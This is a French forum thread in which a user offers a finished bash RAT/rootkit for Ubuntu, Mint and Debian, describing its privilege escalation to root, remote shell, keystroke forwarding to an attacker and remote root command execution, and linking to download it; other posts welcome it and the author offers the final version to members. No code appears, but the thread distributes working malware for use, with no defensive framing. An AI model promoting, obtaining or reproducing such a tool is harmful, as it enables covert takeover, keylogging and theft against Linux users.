Annonce

Réduire
Aucune annonce.

RAT / rootkit sur Ubuntu, Mint et Debian

Réduire
X
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • RAT / rootkit sur Ubuntu, Mint et Debian

    Bonjour,

    J'étais sur un projet de RAT / rootkit pour Linux (j'avais fait un premier test réussi fin 2016 "pour voir", puis j'avais tout rangé dans mes archives avant de reprendre le mois dernier, voyant que ça fonctionnait toujours), mais n'ayant plus vraiment le temps de le terminer, je souhaiterais partager mon travail là où il en est aujourd'hui afin que chacun puisse le tester, le finir ou l'améliorer s'il le souhaite. Il est construit pour récupérer les droits root sur Ubuntu, Mint ou Debian. Ensuite, il peut ouvrir un remote shell, envoyer les frappes clavier à un attaquant ou exécuter des commandes root à distance. Il est écrit en bash mais je n'ai pas le temps de le finir ou de l'écrire dans un autre langage. Il reste un certain nombre de choses à terminer pour qu'il soit 100% fonctionnel mais il fonctionne déjà correctement dans un grand nombre de situation.

    L'ensemble des fichiers se trouve ici "Malicious Bidule" : https://closeone.000webhostapp.com/root/

    Plus d'informations se trouvent également ici : https://closeone.000webhostapp.com/
    Dernière modification par acloseone, 04 août 2018, 17h51.

  • #2
    Salut, ton partage est assez étrange du fait que tu n'es qu'un message de poster.
    Mais merci quand même, certaines personnes ici s'amuseront avec !

    Commentaire


    • #3
      Je l'ai déjà posté sur un forum concurrent, forum pour lequel je n'ai pas plus d'affinités que pour celui-ci, donc pas de raison de ne pas le laisser ici aussi, puisque c'est pour le partager à ceux que ça pourrait intéresser.

      Commentaire


      • #4
        Finalement, je viens de le finir... Je ne le réécrirai pas dans un autre language car il marche très bien comme ça (même s'il y a probablement des bugs qui m'ont échappés), et changer de langage demanderait des modifs qui ne sont pas forcément pertinentes ou valant la peine. Finalement, me pencher dernièrement sur un autre projet en C++ m'aura permis de transférer ces premières connaissances vers bash et de simplifier pas mal de choses.

        Cette version que je considère donc comme finie fonctionne automatiquement avec différentes langues sans avoir besoin d'être modifiée (il faut "simplement" remapper un fichier de config en y ajoutant la nouvelle langue, ce qui demande BEAUCOUP moins de travail). Le script ne fait plus que 400 lignes (annoté) au lieu des presque 1000 du précédent, pour un fonctionnement quasiment similaire (les options "lourdes" ont été supprimées mais peuvent être ajouter depuis un script de commande à distance) et pour une charge processeur franchement réduire, voire quasiment non significative. Je l'ai testé sur Ubuntu 18.04, Mint 18.3 Cinnamon, Mint 19 Mate, Kubuntu 14.04, 16.04 et 18.04, Xubuntu et Lubuntu 18.04 ainsi que Debian 9.4 XFCE.

        Voilà, ça me pendait au nez de le finir, et surtout, ça me demangeait, c'est fait ! Je vais pouvoir passer à autre chose l'esprit tranquille ! Si des membre de ce forum qui avaient pu jeter un oeil sur la version précédente sont intéressés pour jeter un oeil sur celle-ci, je vous la ferais passer.
        Dernière modification par acloseone, 19 août 2018, 07h34.

        Commentaire

        Chargement...
        X